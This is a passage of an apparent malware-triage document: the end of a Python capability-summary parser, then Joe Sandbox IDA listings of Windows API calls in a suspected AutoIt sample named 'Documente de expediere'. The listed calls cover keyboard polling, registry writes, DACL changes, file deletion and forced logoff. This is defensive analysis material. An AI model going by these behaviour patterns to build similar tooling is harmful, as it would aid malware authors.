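        print(f"entry {i} fuzzy={fuzzy} caps={classify(e)} consts={decode_constants(e)}")
```

Run it on the full report text (the whole function listing pasted into a file) to get one capability summary per entry; the `Instruction Fuzzy Hash` field is carried along so a tagged entry can be matched against other samples that share the same AutoIt runtime routine. The rule table is deliberately a plain dict so a triager can add or tighten groupings without touching the parser.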
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006FC9F8
                                                • FindClose.KERNEL32(00000000), ref: 006FCA4C
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FCA71
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FCA88
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 006FCAAF
                                                • __swprintf.LIBCMT ref: 006FCAFB
                                                • __swprintf.LIBCMT ref: 006FCB3E
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • __swprintf.LIBCMT ref: 006FCB92
                                                  • Part of subcall function 006B38D8: __woutput_l.LIBCMT ref: 006B3931
                                                • __swprintf.LIBCMT ref: 006FCBE0
                                                  • Part of subcall function 006B38D8: __flsbuf.LIBCMT ref: 006B3953
                                                  • Part of subcall function 006B38D8: __flsbuf.LIBCMT ref: 006B396B
                                                • __swprintf.LIBCMT ref: 006FCC2F
                                                • __swprintf.LIBCMT ref: 006FCC7E
                                                • __swprintf.LIBCMT ref: 006FCCCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: b4d5af5c1f3cdd2d459988ee536d43bdaaf7ed7010d934273f49eba38e65a8cb
                                                • Instruction ID: 6a5729d13863ed35329edea7f4bb304fa2a3035a2ce5a04dc32e99e4144b8cfa
                                                • Opcode Fuzzy Hash: b4d5af5c1f3cdd2d459988ee536d43bdaaf7ed7010d934273f49eba38e65a8cb
                                                • Instruction Fuzzy Hash: D6A13EB1518304ABCB40EB68C985DAFB7EDFF94700F40492DF586D3591EA34EA09CB66
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 006FF221
                                                • _wcscmp.LIBCMT ref: 006FF236
                                                • _wcscmp.LIBCMT ref: 006FF24D
                                                • GetFileAttributesW.KERNEL32(?), ref: 006FF25F
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 006FF279
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006FF291
                                                • FindClose.KERNEL32(00000000), ref: 006FF29C
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF2B8
                                                • _wcscmp.LIBCMT ref: 006FF2DF
                                                • _wcscmp.LIBCMT ref: 006FF2F6
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF308
                                                • SetCurrentDirectoryW.KERNEL32(0074A5A0), ref: 006FF326
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF330
                                                • FindClose.KERNEL32(00000000), ref: 006FF33D
                                                • FindClose.KERNEL32(00000000), ref: 006FF34F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: be71b2b7b5e638aa7316a0acc219bff103eea94c1397031aaac8a72a88e6e06e
                                                • Instruction ID: 2cd6c1ee3004d60d69798a09d7b29cb65ce070f20834eb407e064843589d3894
                                                • Opcode Fuzzy Hash: be71b2b7b5e638aa7316a0acc219bff103eea94c1397031aaac8a72a88e6e06e
                                                • Instruction Fuzzy Hash: F631E87660021D6ADB10DFB4DC49AEE73ADAF08360F108176E914E31D0EB74DA85CB58
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710BDE
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0071F910,00000000,?,00000000,?,?), ref: 00710C4C
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00710C94
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00710D1D
                                                • RegCloseKey.ADVAPI32(?), ref: 0071103D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0071104A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: f5e06cca9fbe9cd374b34a86b09a3b3369989fb2c32fe2caa83dc97acc666856
                                                • Instruction ID: de1c042d9b94a8e19ae25a4fdbbac4086ff116abd4695759f6a6b35d07d98091
                                                • Opcode Fuzzy Hash: f5e06cca9fbe9cd374b34a86b09a3b3369989fb2c32fe2caa83dc97acc666856
                                                • Instruction Fuzzy Hash: F502B3752046119FCB54EF18C881E6AB7EAFF88710F04845DF98A9B7A1CB34EC81CB95
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 006FF37E
                                                • _wcscmp.LIBCMT ref: 006FF393
                                                • _wcscmp.LIBCMT ref: 006FF3AA
                                                  • Part of subcall function 006F45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006F45DC
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006FF3D9
                                                • FindClose.KERNEL32(00000000), ref: 006FF3E4
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF400
                                                • _wcscmp.LIBCMT ref: 006FF427
                                                • _wcscmp.LIBCMT ref: 006FF43E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF450
                                                • SetCurrentDirectoryW.KERNEL32(0074A5A0), ref: 006FF46E
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF478
                                                • FindClose.KERNEL32(00000000), ref: 006FF485
                                                • FindClose.KERNEL32(00000000), ref: 006FF497
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: 3d0c1c9b0f827c352de593b0675a8e5c08f5942e859cfc03e57688c49556b00c
                                                • Instruction ID: 5a0b7764a5e8b3239d93964d8129f68f64025a5ddd6296a4c7d7d30a155e2d4d
                                                • Opcode Fuzzy Hash: 3d0c1c9b0f827c352de593b0675a8e5c08f5942e859cfc03e57688c49556b00c
                                                • Instruction Fuzzy Hash: F531E77260521D6BDB109B78EC88AEE77AE9F09320F104175E910E32E1DB74DE84CA98
                                                APIs
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                  • Part of subcall function 006E874A: GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                  • Part of subcall function 006E874A: GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                  • Part of subcall function 006E874A: HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                  • Part of subcall function 006E87E7: GetProcessHeap.KERNEL32(00000008,006E8240,00000000,00000000,?,006E8240,?), ref: 006E87F3
                                                  • Part of subcall function 006E87E7: HeapAlloc.KERNEL32(00000000,?,006E8240,?), ref: 006E87FA
                                                  • Part of subcall function 006E87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006E8240,?), ref: 006E880B
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E825B
                                                • _memset.LIBCMT ref: 006E8270
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E828F
                                                • GetLengthSid.ADVAPI32(?), ref: 006E82A0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006E82DD
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E82F9
                                                • GetLengthSid.ADVAPI32(?), ref: 006E8316
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006E8325
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E832C
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E834D
                                                • CopySid.ADVAPI32(00000000), ref: 006E8354
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E8385
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E83AB
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E83BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 4d9f96ef544a9944823b02a6bd31e225b48503c3bf15859c49b37ee5960dd442
                                                • Instruction ID: b247469240b8b6f4c0682eca05df05664e94d08d9bc67ad43bfec5faac61bdf9
                                                • Opcode Fuzzy Hash: 4d9f96ef544a9944823b02a6bd31e225b48503c3bf15859c49b37ee5960dd442
                                                • Instruction Fuzzy Hash: 90616D71901259EFDF00DFA5DC44AEEBBBAFF04700F148169F819AB291DB359A05CB64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oaj$PJs$UCP)$UTF)$UTF16)
                                                • API String ID: 0-3081091665
                                                • Opcode ID: 2435cf620dca98504671356765a891283638d24433be0670453901ccc70a43e5
                                                • Instruction ID: ec6b9825bc8de4128a93ff497837bd8dd1d08aadc367f1f98e4cd32b3d89d24e
                                                • Opcode Fuzzy Hash: 2435cf620dca98504671356765a891283638d24433be0670453901ccc70a43e5
                                                • Instruction Fuzzy Hash: 17727C71E013199BDB24DF59C8907EEB7B6EF49710F14816AE849AB380EB349D81DF90
                                                APIs
                                                  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710737
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007107D6
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0071086E
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00710AAD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00710ABA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: bd68d280a7986452a6c387822fc214312ee6654cc5e85d5530c9cd6a0210e239
                                                • Instruction ID: 53b4ebe77de6a8b45e15c337996e74599a7f2c857e21d4944a684d70be890f80
                                                • Opcode Fuzzy Hash: bd68d280a7986452a6c387822fc214312ee6654cc5e85d5530c9cd6a0210e239
                                                • Instruction Fuzzy Hash: C9E15E71204300AFCB54DF28C891E6ABBE9EF89714B04C56DF44ADB2A1DB74ED81CB95
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 006F0241
                                                • GetAsyncKeyState.USER32(000000A0), ref: 006F02C2
                                                • GetKeyState.USER32(000000A0), ref: 006F02DD
                                                • GetAsyncKeyState.USER32(000000A1), ref: 006F02F7
                                                • GetKeyState.USER32(000000A1), ref: 006F030C
                                                • GetAsyncKeyState.USER32(00000011), ref: 006F0324
                                                • GetKeyState.USER32(00000011), ref: 006F0336
                                                • GetAsyncKeyState.USER32(00000012), ref: 006F034E
                                                • GetKeyState.USER32(00000012), ref: 006F0360
                                                • GetAsyncKeyState.USER32(0000005B), ref: 006F0378
                                                • GetKeyState.USER32(0000005B), ref: 006F038A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 86343024c0a7391012dd956dbae1bc1ca0fd851c81d8b13f15d5cf5aef45615b
                                                • Instruction ID: da7029e0145f02caa3f2a7d3fa1d62f29647d81acdb0dcb8650660c56b7f96d3
                                                • Opcode Fuzzy Hash: 86343024c0a7391012dd956dbae1bc1ca0fd851c81d8b13f15d5cf5aef45615b
                                                • Instruction Fuzzy Hash: DF4188355047CF6EFF319A6488083F5BEA26F12344F58809EDBC6463C3EB955AD487A2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 59a9768b66144cc2166af5fcf0ee2405df32bc3e3d7cd7a4c222ae02c7ddd9a8
                                                • Instruction ID: 8b82c56934b917624239e5a72ec7f7d6469cf5acc3baa3fb3c65422aa9915f87
                                                • Opcode Fuzzy Hash: 59a9768b66144cc2166af5fcf0ee2405df32bc3e3d7cd7a4c222ae02c7ddd9a8
                                                • Instruction Fuzzy Hash: B0216D752012109FDB10AF69EC49BAD77A9EF14721F14C02AF94ADB2E1CB78AD01CB5C
                                                APIs
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                  • Part of subcall function 006F4CD3: GetFileAttributesW.KERNEL32(?,006F3947), ref: 006F4CD4
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006F3ADF
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006F3B87
                                                • MoveFileW.KERNEL32(?,?), ref: 006F3B9A
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006F3BB7
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F3BD9
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006F3BF5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 5f43794362208e17e6d3a9d2497e2cb06eca45d5463aab76dc262d4d445af0fb
                                                • Instruction ID: 5ce252ed7cef3cd95c6cf3fd39b90b5f5fc1eafcd86143194e0fcb6f417052a8
                                                • Opcode Fuzzy Hash: 5f43794362208e17e6d3a9d2497e2cb06eca45d5463aab76dc262d4d445af0fb
                                                • Instruction Fuzzy Hash: D551813180525DAACF45EBE4CD929FDB77AAF14300F244169E40277291EF306F09CBA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$Oaj$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-2582381147
                                                • Opcode ID: 7e6eb0a3c6f1fac35ae0710e6ef871dfc9e9504b483e13360b448fd3042708ac
                                                • Instruction ID: 071253ce9d6301100e2ee15963ea26fd593aa603176431fb582701565fd348c6
                                                • Opcode Fuzzy Hash: 7e6eb0a3c6f1fac35ae0710e6ef871dfc9e9504b483e13360b448fd3042708ac
                                                • Instruction Fuzzy Hash: 5EA27E70E0421A8BDF24DF58C9907EDB7B2BF96314F1481AAD815A7380EBB49E81CF51
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006FF6AB
                                                • Sleep.KERNEL32(0000000A), ref: 006FF6DB
                                                • _wcscmp.LIBCMT ref: 006FF6EF
                                                • _wcscmp.LIBCMT ref: 006FF70A
                                                • FindNextFileW.KERNEL32(?,?), ref: 006FF7A8
                                                • FindClose.KERNEL32(00000000), ref: 006FF7BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 713712311-438819550
                                                • Opcode ID: 88703d32290e0eed315686806d7406860c7c57062ee5735ee3fa1c442884ca69
                                                • Instruction ID: 4e93b458b20abb8116713a3d3ed3616226bcac1fddd76d2565ff8eb1020bfbdb
                                                • Opcode Fuzzy Hash: 88703d32290e0eed315686806d7406860c7c57062ee5735ee3fa1c442884ca69
                                                • Instruction Fuzzy Hash: DE41B37190420EAFCF51EF64DC85AEEBBB9FF05310F14456AE915A32A1EB309E44CB94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 75d8ebedd73c26c1482a5c02c85060c1b24a345a8f509ce0ee04f01a1121dc6d
                                                • Instruction ID: 3497f1cf01eab63215264b0361ec5e5a6c6f64a2c880cbb9f27795b51eb45ceb
                                                • Opcode Fuzzy Hash: 75d8ebedd73c26c1482a5c02c85060c1b24a345a8f509ce0ee04f01a1121dc6d
                                                • Instruction Fuzzy Hash: 56129A70A00609EFDF14EFA5D981AEEB7BAFF49300F108169E806E7251EB35AD51CB54
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • _memmove.LIBCMT ref: 006E062F
                                                • _memmove.LIBCMT ref: 006E0744
                                                • _memmove.LIBCMT ref: 006E07EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID: yZj
                                                • API String ID: 1300846289-1230157653
                                                • Opcode ID: 3582f3c38ba951e32fb718575203ca053314e97f311ff948599e29274ac3ebf5
                                                • Instruction ID: 99e9da9086d6cc5cb4730f77e5654f63947d7d7af3adb4b73f6dd1e089d3acd0
                                                • Opcode Fuzzy Hash: 3582f3c38ba951e32fb718575203ca053314e97f311ff948599e29274ac3ebf5
                                                • Instruction Fuzzy Hash: 7C02EFB0A01209DFDF04EF65D981AAEBBB6EF45300F1480A9E806DB355EB34DD91CB95
                                                APIs
                                                  • Part of subcall function 006E8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                  • Part of subcall function 006E8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                  • Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47
                                                • ExitWindowsEx.USER32(?,00000000), ref: 006F549B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
